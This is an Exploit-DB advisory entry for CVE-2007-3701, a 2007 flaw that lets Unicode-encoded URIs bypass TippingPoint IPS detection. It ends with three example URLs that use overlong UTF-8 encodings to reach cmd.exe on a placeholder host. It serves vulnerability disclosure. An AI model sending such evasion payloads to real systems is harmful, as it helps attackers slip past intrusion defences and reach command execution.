TippingPoint IPS Unicode Character Detection Bypass Vulnerability

2007-07-10T00:00:00
ID EDB-ID:30287
Type exploitdb
Reporter Security-Assessment.com
Modified 2007-07-10T00:00:00

Description

TippingPoint IPS Unicode Character Detection Bypass Vulnerability. CVE-2007-3701. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/24855/info

TippingPoint IPS is prone to a detection-bypass vulnerability because the appliance fails to properly handle Unicode characters.

A successful exploit of this issue may allow an attacker to bypass the filter and detection system of vulnerable appliances, allowing malicious URI traffic through. This will likely aid the attacker in further attacks.

http://www.example.com/scripts%c0%afcmd.exe
http://www.example.com/scripts%e0%80%afcmd.exe
http://www.example.com/scripts%c1%9ccmd.exe